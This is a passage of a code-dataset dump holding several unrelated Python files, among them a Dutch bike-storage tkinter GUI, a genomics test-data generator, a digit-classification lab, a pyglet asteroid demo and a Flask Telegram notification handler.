\\n(voer hier een het getal van je ov chipkaart in zonder de spaties): \").pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n entry = Entry(window)\r\n entry.pack()\r\n\r\n def closeTab():\r\n window.withdraw()\r\n\r\n def callback1(): # geeft chipkaartnummer waarde van entry\r\n global chipkaartnummer\r\n chipkaartnummer = entry.get()\r\n\r\n if len(chipkaartnummer) == 16:\r\n try:\r\n int(chipkaartnummer)\r\n register()\r\n except:\r\n showinfo(message='U heeft geen getal ingevoerd')\r\n print(\"GEEN GETAL\") # is voor test\r\n chipscan()\r\n else:\r\n showinfo(message='De code was niet 16 tekens lang ')\r\n print(\"NIET LANG\") # is test\r\n # quit(window)\r\n chipscan()\r\n closeTab()\r\n\r\n b1 = Button(window, text=\"submit\", command= lambda: callback1())\r\n b1.pack()\r\n\r\nroot = Tk()\r\nnsBlue = '#002D72'\r\nnsYellow = '#FFC72C'\r\nroot.configure(bg=nsYellow)\r\n\r\nlabel = Label(master=root,\r\n text='Fietsenstalling',\r\n font =(\"Italic\",50),\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n width=15,\r\n height=2)\r\nlabel.pack()\r\n\r\nlabel1 = Label(master=root,\r\n text='Welkom bij de NS fietsenstalling. \\nSelecteer wat u wilt doen.',\r\n font =(\"Italic\",15),\r\n foreground=nsBlue,\r\n background=nsYellow)\r\nlabel1.pack()\r\n\r\nbutton = Button(master=root,\r\n text=\"Fiets registreren\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=register)\r\nbutton.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nbutton2 = Button(master=root,\r\n text=\"Fiets stallen\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=store)\r\nbutton2.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nbutton3 = Button(master=root,\r\n text=\"Fiets ophalen\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=pickup)\r\nbutton3.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nbutton4 = Button(master=root,\r\n text=\"Informatie opvragen\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=count)\r\nbutton4.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nroot.mainloop()\r\n\r\n","sub_path":"PythonProject/test for entry 2.py","file_name":"test for entry 2.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104221072","text":"# If this is run as a script, then it makes a directory `test_data_files`\n# with all the test data files.\n# This is not indended to be run by the user.\n# It assumes samtools and minimap2 are installed.\n#\n# There's a separate commnd line task make_test_data. 
It copies the\n# Files directory, but then also edits the file `manifest.tsv` (used by the\n# nextflow joint genotype pipeline), to put absolute paths in there.\n# Has to be done at run time because that's when we know the full path.\nimport copy\nimport os\nimport random\nimport subprocess\nimport pyfastaq\n\nfrom minos import utils\n\ndef _call_variants(ref, reads, out, mates=None):\n    bam = f\"{out}.bam\"\n    if mates is None:\n        command = f\"minimap2 -a {ref} {reads}\"\n    else:\n        command = f\"minimap2 -x sr -a {ref} {reads} {mates}\"\n    command += f\" | samtools sort -O BAM -o {bam}\"\n    subprocess.check_output(command, shell=True)\n    command = f\"samtools mpileup -ugf {ref} {bam} | bcftools call -vm -O v -o {out}.vcf\"\n    subprocess.check_output(command, shell=True)\n    subprocess.check_output(f\"samtools index {bam}\", shell=True)\n\n\ndef _make_test_data():\n    random.seed(42)\n\n    outdir = \"test_data_files\"\n    os.mkdir(outdir)\n\n    ref_fasta = os.path.join(outdir, \"ref.fa\")\n    sample1_pre = os.path.join(outdir, \"sample1\")\n    sample2_pre = os.path.join(outdir, \"sample2\")\n    reads1_1 = f\"{sample1_pre}.reads_1.fastq.gz\"\n    reads1_2 = f\"{sample1_pre}.reads_2.fastq.gz\"\n    reads2 = f\"{sample2_pre}.reads.fastq.gz\"\n\n    ref_seq = random.choices([\"A\", \"C\", \"G\", \"T\"], k=1000)\n    mut_seq1 = copy.copy(ref_seq)\n    mut_seq2 = copy.copy(ref_seq)\n\n    ref_seq[199] = \"A\"\n    mut_seq1[199] = \"C\"\n    mut_seq2[199] = \"C\"\n\n    ref_seq[399] = \"G\"\n    mut_seq1[399] = \"A\"\n    mut_seq2[399] = \"G\"\n\n    ref_seq[599] = \"T\"\n    mut_seq1[599] = \"T\"\n    mut_seq2[599] = \"C\"\n\n    with open(ref_fasta, \"w\") as f:\n        print(\">ref\", \"\".join(ref_seq), sep=\"\\n\", file=f)\n\n    mut_fasta1 = os.path.join(outdir, \"tmp.mut1.fa\")\n    with open(mut_fasta1, \"w\") as f:\n        print(\">m1\", \"\".join(mut_seq1), sep=\"\\n\", file=f)\n\n    mut_fasta2 = os.path.join(outdir, \"tmp.mut2.fa\")\n    with open(mut_fasta2, \"w\") as f:\n        print(\">m2\", \"\".join(mut_seq2), sep=\"\\n\", file=f)\n\n    subprocess.check_output(f\"fastaq to_perfect_reads {mut_fasta1} - 250 1 20 100 | fastaq deinterleave - {reads1_1} {reads1_2}\", shell=True)\n\n    subprocess.check_output(f\"fastaq to_perfect_reads {mut_fasta2} {reads2} 250 1 20 100\", shell=True)\n\n    _call_variants(ref_fasta, reads1_1, sample1_pre, mates=reads1_2)\n    _call_variants(ref_fasta, reads2, sample2_pre)\n\n    os.unlink(mut_fasta1)\n    os.unlink(mut_fasta2)\n\n    os.rename(f\"{sample1_pre}.vcf\", os.path.join(outdir, \"in.1.vcf\"))\n    os.rename(f\"{sample2_pre}.vcf\", os.path.join(outdir, \"in.2.vcf\"))\n\n    with open(os.path.join(outdir, \"manifest.tsv\"), \"w\") as f:\n        print(\"name\\treads\\tvcf\", file=f)\n        print(\"sample1\\tsample1.bam\\tin.1.vcf\", file=f)\n        print(\"sample2\\tsample2.bam\\tin.2.vcf\", file=f)\n\n\ndef make_test_data_dir(outdir):\n    if os.path.exists(outdir):\n        raise Exception(f\"Output directory {outdir} already exists. Cannot continue\")\n    this_file_dir = os.path.dirname(os.path.realpath(__file__))\n    dir_to_copy = os.path.join(this_file_dir, \"test_data_files\")\n    if not os.path.exists(dir_to_copy):\n        raise Exception(f\"Error! Did not find test data files. 
Expected to find them here: {dir_to_copy}\")\n\n utils.syscall(f\"cp -rp {dir_to_copy} {outdir}\")\n\n # Need to fix the manifest file so that the filenames are absolute paths,\n # required by the joint genotype pipeline\n outdir = os.path.abspath(outdir)\n manifest = os.path.join(outdir, \"manifest.tsv\")\n lines_out = []\n with open(manifest) as f:\n for line in f:\n if len(lines_out) == 0:\n lines_out.append(line.rstrip().split(\"\\t\"))\n else:\n fields = line.rstrip().split(\"\\t\")\n for i in [1,2]:\n fields[i] = os.path.join(outdir, fields[i])\n lines_out.append(fields)\n\n with open(manifest, \"w\") as f:\n for t in lines_out:\n print(*t, sep=\"\\t\", file=f)\n\n\nif __name__ == \"__main__\":\n _make_test_data()\n\n","sub_path":"minos/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469265418","text":"import sys\nfrom os import path\nimport collections\nsys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )\nfrom PyQt5 import QtCore,QtWidgets,QtGui\n\n\ndef AdminConfirm(func):\n def wrapper(*args, **kwargs):\n print('admin confirm')\n print(args)\n u = func(*args, **kwargs)\n return u\n return wrapper\n\n\n@AdminConfirm\ndef hello(s = 'hi'):\n print(s)\n\nclass test(QtCore.QObject):\n def __init__(self, parent = None):\n print('init')\n\n @AdminConfirm\n def hello(self):\n print('hello')\n\nTripEntry = collections.namedtuple('TripEntry', 'FileId CarId DriverId ParticipantId FileDatetime FCW Len Labels')\n\n\nclass QtClassMember(QtCore.QObject):\n def __init__(self, li):\n self.li = li\n self.li.append('aaaaaa')\n\n\nif __name__ == '__main__':\n # hello('nihao')\n # obj = test()\n # obj.hello()\n l = [123456, 987, 321, 5678, 'datetime', 'fcw', '5555', 'hello world']\n # trip = TripEntry._make(l)\n\n mem = QtClassMember(l)\n print(mem.li)\n print(l)\n # print(trip)\n ","sub_path":"UI/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433671956","text":"#!/usr/bin/python3\n\n\"\"\"Get the number of syllables of a vowel cluster with context\"\"\"\n\nimport os\nimport json\nimport sys\n\n\nclass DiaeresisFinder(object):\n\n def __init__(self, diaeresis_file=\"../data/diaeresis.json\"):\n self._trie = None\n self._diaeresis_file = diaeresis_file\n try:\n self._load_diaeresis()\n except json.JSONDecodeError:\n pass # cannot read the file, we assume that another file will be loaded later\n\n def _load_diaeresis(self):\n with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), self._diaeresis_file)) as f:\n self._trie = json.load(f)\n\n def do_lookup_sub(self, trie, key):\n if len(key) == 0 or (key[0] not in trie[1].keys()):\n return trie[0]\n return self.do_lookup_sub(trie[1][key[0]], key[1:])\n\n def lookup(self, key):\n return self.do_lookup(key + ['-', '-'])\n\n def wrap_lookup(self, line_read):\n result = self.lookup(line_read)\n print(\"%s: %s\" % (line_read, result))\n\n def do_lookup(self, key):\n return self.do_lookup_sub(self._trie, key)\n\n\ndiaeresis_finder = DiaeresisFinder()\n\n\ndef set_diaeresis(diaeresis_file):\n global diaeresis_finder\n diaeresis_finder = DiaeresisFinder(diaeresis_file=diaeresis_file)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n diaeresis_finder = DiaeresisFinder(sys.argv[1])\n\n if len(sys.argv) > 2:\n for arg in sys.argv[2:]:\n 
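# each remaining CLI argument is looked up as a single key\n            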
diaeresis_finder.wrap_lookup(arg)\n    else:\n        while True:\n            line = sys.stdin.readline()\n            if not line:\n                break\n            diaeresis_finder.wrap_lookup(line.lower().lstrip().rstrip().split())\n","sub_path":"venv/Lib/site-packages/plint/diaeresis.py","file_name":"diaeresis.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160821743","text":"##\n# This code doesn't work\n##\n\n\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport util as u\n\n# data setting\nrun_date = \"mar18\"\nrun_number = 4\n\ninput_tmp = \"../data/time_cal/time_calibration_{}_run{}.txt\"\n\ninput_file = u.format_string(input_tmp, run_date, run_number)\n\n# read in the data file\nnum_row = 0 \nprint(\"reading \", input_file)\nwith open(input_file, newline='') as handle:\n    reader = csv.reader(handle, delimiter=\"=\")\n    \n    # count the number of rows\n    for row in reader:\n        num_row += 1\n\n    handle.seek(0) # rewind the file \n    \n    data = np.zeros((2, num_row))\n    data[0][:] = np.arange(0, num_row, dtype=float)\n\n    # store the data\n    i = 0\n    for row in reader:\n        data[1][i] = int(row[0])\n        print(i, data[1][i])\n        i += 1\n\n","sub_path":"muon-lifetime/scripts/dumb_timecal.py","file_name":"dumb_timecal.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387872234","text":"# Command for jupyter notebook\n# %matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nfrom euclidean_estimator import EuclideanClassifier\n\n# Define file names and image H(eight), W(idth)\ntrain_file_name = os.path.join(os.getcwd(), 'pr_lab1_2016-17_data', 'train.txt')\ntest_file_name = os.path.join(os.getcwd(), 'pr_lab1_2016-17_data', 'test.txt')\nH = 16\nW = 16\noutput = True\n\n\n# Function that reshapes the feature array in order to display \n# the image of a digit\ndef plot_digit(digit, fig_name='Unknown', axes = None):\n    # Make digit record into a 16x16 array\n    # ravel() used to make the array flat\n    im_digit = digit.reshape(H, W)\n\n    # Plot the digit\n    if axes == None:\n        plt.figure('Digit ' + str(fig_name))\n        plt.title('Digit ' + str(fig_name))\n        plt.imshow(im_digit, cmap='Greys')\n        plt.show()\n    else:\n        axes.set_title('Digit ' + str(fig_name))\n        axes.imshow(im_digit, cmap='Greys')\n\n\ndef little_euclidean_classifier(test_digit, feature_means):\n    best_label = None\n    distance = np.inf\n    \n    for label in feature_means:\n        new_distance = np.linalg.norm(feature_means[int(label)] - test_digit)\n        if new_distance < distance:\n            # keep the running minimum, otherwise every label overwrites the previous one\n            distance = new_distance\n            best_label = label\n    return best_label\n\n\n# Read files (converted to numpy arrays so the positional slicing below works)\ntrain = pd.read_csv(train_file_name, sep=' ', header=None).values\ntest = pd.read_csv(test_file_name, sep=' ', header=None).values\n\n# Split labels - features\ntrain_y = train[:, 0]\ntrain_X = train[:, 1:]\ntest_y = test[:, 0]\ntest_X = test[:, 1:]\n\n# Extract digit 131 and plot it\nif output:\n    plot_digit(train_X[130, :], train_y[130])\n\n# Get a random sample for each digit and plot them\ndigit_samples = []\nfor label in np.unique(train_y):\n    # From the subset of entries with this label, get 1 random sample\n    label_X = train_X[train_y == label, :]\n    sample_digit = label_X[np.random.randint(0, label_X.shape[0]), :]\n    digit_samples += [(label, sample_digit)]\n\nplt.rcParams['figure.figsize'] = [10, 10]\n\nfig, axes = plt.subplots(5,2)\nplt.tight_layout()\naxes_i = 0\naxes_j = -1\n\nfor (label, digit) in digit_samples:\n    if axes_i % 5 == 0:\n        
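# wrap to the next subplot column after every five digits\n        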
axes_j += 1\n axes_i = 0\n if output:\n plot_digit(digit, label, axes[axes_i, axes_j])\n axes_i += 1\n\n# Calculate the mean of all (10,10) pixels for all zeroes\nzeroes = train_X[train_y == 0, :] # Removing the digit label\ntemp = zeroes[:, 10*16 + 9]\nif output:\n print(\"Mean value of pixel 10, 10 for digit 0 =\", np.mean(temp))\n print(\"Variance of pixel 10, 10 for digit 0 =\",np.var(temp))\n \n# Calculate the mean of all pixels for all zeroes\npixel_means = np.mean(zeroes, axis=0)\npixel_vars = np.var(zeroes, axis=0)\n\n# Plot mean 0-digit\nplt.rcParams['figure.figsize'] = [4, 5]\n\nif output:\n plot_digit(pixel_means, fig_name='0 (Mean)')\n plot_digit(pixel_vars, fig_name='0 (Variance)')\n\n\n# Calculate mean and variance for all pixels of all digits\npixel_means = {} #np.empty(len(np.unique(train_y)), dtype=[('label', np.float64), ('means', np.ndarray)])\npixel_vars = {} #np.empty(len(np.unique(train_y)), dtype=[('label', np.float64), ('means', np.ndarray)])\nplt.rcParams['figure.figsize'] = [10, 10]\nfig, axes = plt.subplots(10,2)\nplt.tight_layout()\naxes_i = 0\n\nfor label in np.unique(train_y):\n features = train_X[train_y == label, :]\n # features = features.iloc[:, 1:-1]\n pixel_means[int(label)] = np.mean(features, axis=0)\n pixel_vars[int(label)] = np.var(features, axis=0)\n\n if output:\n plot_digit(pixel_means[int(label)], fig_name=str(label) + ' (Mean)', axes=axes[axes_i, 0])\n plot_digit(pixel_vars[int(label)], fig_name=str(label) + ' (Variance)', axes=axes[axes_i, 1])\n axes_i += 1\n\n# Classify the test digit\nlabel = little_euclidean_classifier(test_digit=test_X[100, :],\n feature_means=pixel_means)\n\nplt.rcParams['figure.figsize'] = [4, 5]\nif output:\n plot_digit(test_X[100, :], fig_name=' labeled ' + str(label) + ' using means, actually is ' + str(test_y[100]))\n\nif output:\n plot_digit(test_X.loc[100, :], fig_name=' labeled ' + str(label) + ' using means, actually is ' + str(test_Y[100]))\n\n# Classify all test digits\nsuccesses = 0\nfor i in range(len(test_y)):\n label = little_euclidean_classifier(test_digit=test_X[i, :],\n feature_means=pixel_means)\n if label == test_y[i]:\n successes += 1\n\nprint('Classification Success Rate: ' + str(successes / len(test_y)))\n\n# Use module estimator implementation\nec = EuclideanClassifier()\nec.fit(train_X, train_y)\npred_Y = ec.predict(test_X)\nscore = ec.score(test_X, test_y)\nprint('Classification Success Rate: ' + str (score))\n\nfrom sklearn.model_selection import cross_val_score, learning_curve\nffcvs = cross_val_score(estimator=ec, X=train_X, y=train_y, cv=5, n_jobs=-1)\nprint('Cross Validation Score: ' + str(np.mean(ffcvs)))\n\ndef plot_learning_curve(train_scores, test_scores, train_sizes, ylim=(0, 1)):\n plt.figure()\n plt.title(\"Learning Curve\")\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n 
plt.legend(loc=\"best\")\n return plt\n\n\nsizes, train_scores, test_scores = learning_curve(estimator=ec, X=train_X, y=train_y, train_sizes=np.linspace(.1, 1.0, 10), cv=5, n_jobs=-1)\n\nplot_learning_curve(train_scores, test_scores, sizes, ylim=(.8, 0.9))\n\n# load dataset into Pandas DataFrame\nfrom sklearn.preprocessing import StandardScaler\n# Standardizing the features\nx = StandardScaler().fit_transform(train_X)\n\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=2)\nprincipalComponents = pca.fit_transform(x)\nprincipalDf = pd.DataFrame(data = principalComponents\n , columns = ['principal component 1', 'principal component 2'])\nfinalDf = pd.concat([principalDf, pd.DataFrame(train_y)], axis = 1)\nfig = plt.figure(figsize = (8,8))\nax = fig.add_subplot(1,1,1) \nax.set_xlabel('Principal Component 1', fontsize = 15)\nax.set_ylabel('Principal Component 2', fontsize = 15)\nax.set_title('2 component PCA', fontsize = 20)\n\n\n\ntargets = np.unique(train_y)\ncolors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'tab:brown', 'tab:gray', 'tab:orange']\nfor target, color in zip(targets,colors):\n indicesToKeep = finalDf[0] == target\n ax.scatter(finalDf.loc[indicesToKeep, 'principal component 1']\n , finalDf.loc[indicesToKeep, 'principal component 2']\n , c = color\n , s = 10)\nax.legend(targets)\nax.grid()","sub_path":"lab_1_prep.py","file_name":"lab_1_prep.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223055499","text":"import math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef Gaussian_kernel(sigma):\r\n\r\n #滤波窗口大小 [6*sigma-1]/2*2+1\r\n Kernel_size = math.floor(6*sigma-1)//2*2+1\r\n #生成高斯滤波器的核\r\n half = Kernel_size//2\r\n Kernel = np.zeros((Kernel_size, Kernel_size), dtype = np.float)\r\n for x in range(-half, -half+Kernel_size):\r\n for y in range(-half, -half+Kernel_size):\r\n # 不能是负的索引\r\n Kernel[x+half, y+half] = np.exp(-(x**2+y**2)/(2*(sigma**2)))\r\n Kernel /= (2*np.pi*sigma**2)\r\n Kernel /= Kernel.sum()\r\n return Kernel\r\n\r\n #进行高斯滤波\r\ndef Gaussian_kernel_onedim(sigma):\r\n\r\n #滤波窗口大小 [6*sigma-1]/2*2+1\r\n Kernel_size = math.floor(6*sigma-1)//2*2+1\r\n #生成高斯滤波器的核\r\n half = Kernel_size//2\r\n Kernel = np.zeros((Kernel_size), dtype=np.float)\r\n for x in range(-half, -half+Kernel_size):\r\n # 不能是负的索引\r\n Kernel[x+half] = np.exp(-(x**2)/(2*(sigma**2)))\r\n Kernel /= np.sqrt(2*np.pi)*sigma\r\n Kernel /= Kernel.sum()\r\n # 验证卷积核的正确性\r\n # Kernel = Kernel.reshape(Kernel.shape[0], 1)\r\n # print(np.dot(Kernel, Kernel.T))\r\n return Kernel, Kernel_size\r\n #进行高斯滤波\r\n\r\ndef Guass(sigma,image):\r\n # print(Gaussian_kernel_onedim(sigma))\r\n kernel, kernel_size = Gaussian_kernel_onedim(sigma)\r\n res_img_size_x = image.shape[0]-kernel_size//2*2\r\n res_image = np.zeros((res_img_size_x, image.shape[1], 3), dtype=np.float)\r\n # 先对行进行 一维卷积\r\n for i in range(res_img_size_x):\r\n for j in range(image.shape[1]):\r\n sum = 0\r\n for k in range(kernel_size):\r\n sum = sum+image[i+k][j]*kernel[k]\r\n res_image[i][j] = sum\r\n\r\n #对中间结果的列 进行一维卷积\r\n res_img_size_y = image.shape[1] - kernel_size // 2 * 2\r\n final_res_image = np.zeros((res_img_size_x, res_img_size_y, 3), dtype=np.float)\r\n for j in range(res_img_size_y):\r\n for i in range(res_img_size_x):\r\n sum= 0\r\n for k in range(kernel_size):\r\n sum= sum+res_image[i][j+k]*kernel[k]\r\n final_res_image[i][j] = sum\r\n # 0-1之间显示 故要/255\r\n final_res_image /= 255\r\n plt.subplot(1, 2, 2)\r\n 
plt.imshow(final_res_image)\r\n plt.show()\r\n\r\nGaussian_kernel(1)\r\nGaussian_kernel_onedim(1)\r\nimage_path1 = './images/pro_2/a.jpg'\r\nimg = plt.imread(image_path1)\r\nplt.subplot(1, 2, 1)\r\nplt.imshow(img)\r\n\r\nGuass(1, img)\r\n\r\n","sub_path":"experiment_2_1.py","file_name":"experiment_2_1.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"161837725","text":"import matplotlib.pyplot as plt\nfrom scipy.signal import butter, lfilter\nfrom math import sqrt\nfrom numpy import array, mean, std, fft\n\ndef EEGData2Dict(Path2EEGEFile):\n notanumber=True\n label=''\n value=[]\n with open(Path2EEGEFile) as file:\n while(notanumber): # read until find numbers, previous line - label\n line = file.readline()\n if((line=='\\n') or (line=='')):\n continue\n line=line.split(';')\n while((line[-1][-1] == '\\n') or ((line[-1] == ''))):\n newitem=''\n for i in range(len(line[-1])-1):\n newitem+=line[-1][i]\n del line[-1]\n if(len(newitem)):\n line.append(newitem)\n try:\n for i in range(len(line)):\n line[i] = float(line[i])\n #value.append(line) usually first line is broken and contains 0\n notanumber=False\n except(ValueError):\n label=line\n for i in range(len(label)):\n newitem = ''\n for letter in label[i]:\n if letter==' ':\n continue\n newitem+=letter\n label[i]=newitem\n\n for i in range(10):\n line = file.readline() # very noisy lines\n\n while(len(line)):\n line = file.readline()\n if((line=='\\n') or (line=='')):\n continue\n line=line.split(';')\n while ((line[-1][-1] == '\\n') or ((line[-1] == '')) or (line[-1]=='\\n')):\n newitem = ''\n for i in range(len(line[-1]) - 1):\n newitem += line[-1][i]\n del line[-1]\n if (len(newitem)):\n line.append(newitem)\n for i in range(len(line)):\n line[i]=float(line[i])\n value.append(line)\n\n cvalue=[]\n for i in range(len(value[0])):\n column=[]\n for k in range(len(value)):\n column.append(value[k][i])\n cvalue.append(column)\n\n if(len(label)==len(cvalue)):\n valuedict = {label[i]:cvalue[i] for i in range(len(label))}\n return valuedict\n else:\n print(\"Something goes wrong, check number of labels and number of data columns\")\n exit(33)\n\ndef butter_bandpass_filter(data, lowcut, highcut, fs, order=2):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n\n b, a = butter(order, [low, high], btype='band')\n y = lfilter(b, a, data)\n return y\n\ndef three_sigma_cleaning(eegD,chan):\n m=mean(eegD[chan])\n s=std(eegD[chan])\n hborder=m+3*s\n lborder=m-3*s\n for i in range(len(eegD[chan])):\n if ((eegD[chan][i]>hborder) or (eegD[chan][i]my['IED_TIMESTAMP'][-1]):\n stamps[-1] = my['IED_TIMESTAMP'][-2]\n\nstageTime = [0]\nk = 0\nfor i in range(len(my['IED_TIMESTAMP'])):\n if (my['IED_TIMESTAMP'][i] > stamps[k]):\n stageTime.append(i)\n k += 1\n if (k == len(stamps)):\n break\n\nstagesNames = ['Background', 'First TOVA test', 'Hyperventilation', 'Second TOVA test', 'Aftereffect']\n\nfor key in eegDict:\n for rhythm in eegDict[key]:\n eegDict[key][rhythm]={stagesNames[i]:eegDict[key][rhythm][stageTime[i]:stageTime[i+1]] for i in range(len(stagesNames))}\n\n\ni=0\nfor key in channels:\n for rhythm in eegDict[key]:\n for stage in eegDict[key][rhythm]:\n eegDict[key][rhythm][stage]=round(sum([x**2 for x in abs(fft.fft(eegDict[key][rhythm][stage]))]),3)\n print(int(i/(len(channels)*len(rhythms)*len(stagesNames))*100),'%')\n i+=1\n\neegDict=global_index(eegDict)\n\nfinal=[]\nfor stage in range(len(stagesNames)):\n a = 0\n b = 0\n t = 0\n for 
channel in eegDict:\n a+=eegDict[channel]['Alpha'][stagesNames[stage]]\n b+=eegDict[channel]['BetaH'][stagesNames[stage]]\n t+=eegDict[channel]['Theta'][stagesNames[stage]]\n final.append([a/t,b/t])\n\n\nwith open(\"E:\\\\test\\\\AlphaTheta.csv\",'a')as file:\n line=''\n for stage in range(len(stagesNames)):\n for i in range(len(final[stage])):\n line+=str(round(final[stage][i],3))+';'\n line=line[:-1]\n line+='\\n'\n file.write(line)","sub_path":"PycharmProjects/MBIC/EEG_Analysis/alfa-teta.py","file_name":"alfa-teta.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539248947","text":"from pyglet.gl import *\nimport pyglet.graphics\nfrom pyglet.window import mouse\nimport random\nfrom math import cos, sin, pi\n\nwindow = pyglet.window.Window(600, 600, caption=\"moving asteroid\")\ncursor = window.get_system_mouse_cursor(window.CURSOR_HAND)\nwindow.set_mouse_cursor(cursor)\n\n\nbatch = pyglet.graphics.Batch()\nvl_asteroid = batch.add(8, pyglet.gl.GL_POLYGON, None,\n ('v2f', (20.0, 0.0, 30.0, 10.0, 40.0, 0.0, 40.0, 20.0, 50.0, 20.0, 40.0, 50.0, 10.0, 40.0, 0.0, 20.0)),\n)\n\n\nx = 300\ny = 300\nvelocity = 90\ntheta = random.random()*2*pi\ndx = velocity*cos(theta)\ndy = velocity*sin(theta)\n\ndef update(dt):\n global x, y, dx, dy\n x = x + dx*dt\n if x > 600:\n x = x - 600\n if x < 0:\n x = 600 + x\n y = y + dy*dt\n if y > 600:\n y = y - 600\n if y < 0:\n y = 600 + y\n \npyglet.clock.schedule_interval(update, 1/60.0) # update at 60Hz\n\n@window.event\ndef on_mouse_press(u, v, button, modifiers):\n global x, y, dx, dy\n if button == mouse.LEFT:\n dx = u - x\n dy = v - y\n\n@window.event\ndef on_draw():\n glClear(GL_COLOR_BUFFER_BIT)\n # Draw outlines only\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n glLoadIdentity()\n glTranslatef(x, y, 0)\n batch.draw()\n\npyglet.app.run()\n","sub_path":"pyglet/opengl_11.py","file_name":"opengl_11.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254660720","text":"\"\"\"\nCopyright (c) [2019] [sixlab.cn]\n[https://github.com/PatrickRoot/six-site] is licensed under the Mulan PSL v1.\nYou can use this software according to the terms and conditions of the Mulan PSL v1.\nYou may obtain a copy of Mulan PSL v1 at:\n http://license.coscl.org.cn/MulanPSL\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR\nPURPOSE.\nSee the Mulan PSL v1 for more details.\n\"\"\"\nimport sys\nimport traceback\n\nfrom flask import Blueprint, request\n\nfrom config.db import select_one\nfrom config.tele import send_msg\n\napp_notify = Blueprint('app_notify', __name__)\n\n\ndef send_my_help(chat_id):\n site_config = select_one('''\n select *\n from site_config\n where config_key = 'mine.help'\n ''', ())\n import json\n print(json.dumps(site_config))\n send_msg(chat_id, site_config['config_val'])\n\n\ndef mine_message(data):\n chat_id = data['message']['chat']['id']\n\n if data['message']['text'] == '/help':\n send_my_help(chat_id=chat_id)\n\n\n\n@app_notify.route(\"/callback\", methods=['POST'])\ndef notify_callback():\n try:\n print(\"-----\")\n data = request.get_json(force=True)\n print(data, file=sys.stdout)\n\n if data['message']['chat']['id'] in (624880292, 463360558):\n mine_message(data)\n\n except Exception as e:\n 
traceback.print_exc(file=sys.stderr)\n\n return \"ok\"\n\n\ndef sge_au99():\n pass\n","sub_path":"apps/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586285890","text":"#PE12 Highly divisible triangular number\nimport time\n\n\ndef divcount(n):\n result = 1\n for i in range(2, int(n / 2) + 1):\n count = 0\n while n % i == 0:\n n /= i\n count += 1\n result *= (count + 1)\n if n == 1:\n break\n if result == 1:\n return 2\n else:\n return result\n\n\nstart_time = time.time()\ntriangular = 1\ni = 2\n\nwhile divcount(triangular) < 500:\n triangular = triangular + i\n i += 1\nprint(triangular)\nprint(time.time() - start_time, \"seconds\")\n","sub_path":"project_euler_python/PE11-20/PE12.py","file_name":"PE12.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92513792","text":"from flask import abort\nfrom taa.services.cases.case_service import CaseService\n\nfrom taa.services.enrollments.enrollment_application import EnrollmentApplicationService\n\nfrom taa import db, tasks\nfrom taa.core import DBService\nfrom taa.services.data_export import BackgroundExport\n\n\nclass EnrollmentExportService(DBService):\n\n __model__ = BackgroundExport\n\n def export_user_case_enrollments(self, user_href, 